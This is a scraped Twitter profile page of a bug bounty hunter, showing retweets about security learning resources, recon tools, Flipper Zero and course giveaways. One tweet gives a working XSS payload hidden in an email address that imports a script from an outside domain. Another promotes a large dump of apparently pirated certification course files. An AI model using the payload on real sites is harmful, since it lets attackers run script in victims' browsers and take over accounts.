Gajendra upadhyay (@almighty_one007) 's Twitter Profile
Gajendra upadhyay

@almighty_one007

Cybersecurity Researcher, Bug Bounty hunter,Blockchain Enthusiast

ID: 718509586576121856

calendar_today08-04-2016 18:43:29

760 Tweet

37 Followers

363 Following

Nithin πŸ¦Ήβ€β™‚οΈ (@thebinarybot) 's Twitter Profile Photo

Cloud security is one of the hottest topics to learn in 2024 to make $$$$. Explore GCP security through extensive guides, tutorials, and interactive training resources for comprehensive learningπŸ§‘β€πŸ’»

Cloud security is one of the hottest topics to learn in 2024 to make $$$$.

Explore GCP security through extensive guides, tutorials, and interactive training resources for comprehensive learningπŸ§‘β€πŸ’»
Nithin πŸ¦Ήβ€β™‚οΈ (@thebinarybot) 's Twitter Profile Photo

Every Beginner Bug Bounty Hunter must check this. One of the most easiest bugs you can find as a beginner and make $$$ in 2024 πŸ§΅πŸ‘‡

Nithin πŸ¦Ήβ€β™‚οΈ (@thebinarybot) 's Twitter Profile Photo

Want to learn more about Mobile App Pentest / Bug Hunting ? Here is a list of high-quality resources πŸ‘‡ ( PS: The list includes both Android and iOS hacking )

EDDIE CHENG (@ecomeddie) 's Twitter Profile Photo

I’m 33. When I was young, I wasted years drinking, smoking, and being a degenerate. Then I discovered Naval Ravikant and he changed my life forever. Here are 20 teachings from the wisest person of this century (that will change your life too):

I’m 33. 

When I was young, I wasted years drinking, smoking, and being a degenerate.

Then I discovered Naval Ravikant and he changed my life forever.

Here are 20 teachings from the wisest person of this century (that will change your life too):
Nithin πŸ¦Ήβ€β™‚οΈ (@thebinarybot) 's Twitter Profile Photo

πŸ•΅οΈ Finding hidden parameters which are left unnoticed by most of hunters, will definitely help you to get more bugs. One such tool used to find hidden parameters is ARJUN. Checkout this 10 Arjun techniques which every bug bounty hunter should know πŸ‘‡

πŸ•΅οΈ Finding hidden parameters which are left unnoticed by most of hunters, will definitely help you to get more bugs. One such tool used to find hidden parameters is ARJUN. 

Checkout this 10 Arjun techniques which every bug bounty hunter should know πŸ‘‡
zseano (@zseano) 's Twitter Profile Photo

XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>"@yourdomain .com cc Brute Logic - brutelogic.com.br/blog/xss-limit…

Jason Haddix (@jhaddix) 's Twitter Profile Photo

My talk is coming up for NahamCon! Ben Sadeghipour Here is the work-in-progress XSS mutation bot: chatgpt.com/g/g-1cW3hzJ3C-… and the work-in-progress Acquisitions Bot: chatgpt.com/g/g-3GwxLih5t-… and the work-in-progress Reporting Bot: chatgpt.com/g/g-7BYOKw9eo-… and my epic general web

Md Riyazuddin (@riyazmd774) 's Twitter Profile Photo

Everything you can do legally (or almost) with Flipper Zero. The Ultimate Tamagotchi for Hackers... [ πŸ”– Save this for later ]

Everything you can do legally (or almost) with Flipper Zero.

The Ultimate Tamagotchi for Hackers...

[ πŸ”– Save this for later ]
Jason Haddix (@jhaddix) 's Twitter Profile Photo

Arcanum Information Security On June 23rd i'll be giving my "Credential Operations" / "Operationalizing Cybercrime Data for Red Teamers and Offsec" training FREE! it's gonna be πŸ”₯πŸ”₯πŸ”₯ Register here πŸ‘‡ flare.registration.goldcast.io/webinar/1e64a5…

<a href="/arcanuminfosec/">Arcanum Information Security</a> On June 23rd i'll be giving my "Credential Operations" / "Operationalizing Cybercrime Data for Red Teamers and Offsec" training FREE! it's gonna be πŸ”₯πŸ”₯πŸ”₯

Register here πŸ‘‡ 

flare.registration.goldcast.io/webinar/1e64a5…
chux (@chux13786509) 's Twitter Profile Photo

Just tried FOFA AI on a fresh target, and the results blew me away! πŸš€ It enriched domains, certs, ASNs, and names, then generated a detailed graph of the target's attack surface in minutes. Hands down, better than many recon automation tools I've used for building a map of the

Just tried FOFA AI on a fresh target, and the results blew me away! πŸš€
It enriched domains, certs, ASNs, and names, then generated a detailed graph of the target's attack surface in minutes.
Hands down, better than many recon automation tools I've used for building a map of the
X (@themsterdoctor1) 's Twitter Profile Photo

πŸ§ πŸ’£ 381 FILES. 200+ GB. ELITE ONLY. I just unlocked a vault that would make even top bug bounty hunters drop everything: πŸ”₯ OSCP πŸ”₯ OSEP πŸ”₯ OSWE πŸ”₯ THM / HTB πŸ”₯ EC-Council πŸ”₯ Cisco CyberOps πŸ”₯ Linux Priv Esc πŸ”₯ PEN-300 Full Video Series πŸ”₯ BloodHound, AD, SSH, API, SQL, πŸ”₯

πŸ§ πŸ’£  381 FILES. 200+ GB. ELITE ONLY.

I just unlocked a vault that would make even top bug bounty hunters drop everything:

πŸ”₯ OSCP
πŸ”₯ OSEP
πŸ”₯ OSWE
πŸ”₯ THM / HTB
πŸ”₯ EC-Council
πŸ”₯ Cisco CyberOps
πŸ”₯ Linux Priv Esc
πŸ”₯ PEN-300 Full Video Series
πŸ”₯ BloodHound, AD, SSH, API, SQL, πŸ”₯
HackerRats - Uncle Rat ❀️ (XSS Rat) (@thexssrat) 's Twitter Profile Photo

Giveaway thiiiemmmmeeeee RATS LISTEN UP I will do this for you , but PLEASE get me to 150 k 1000's OF FREE COURSES!!! PLEASE SHARE AND SHOW THE WORLD THAT THE RAT IS STRONG!! CAPIE ========== udemy.com/course/capie-c… udemy.com/course/capie-c… CNWPP ==========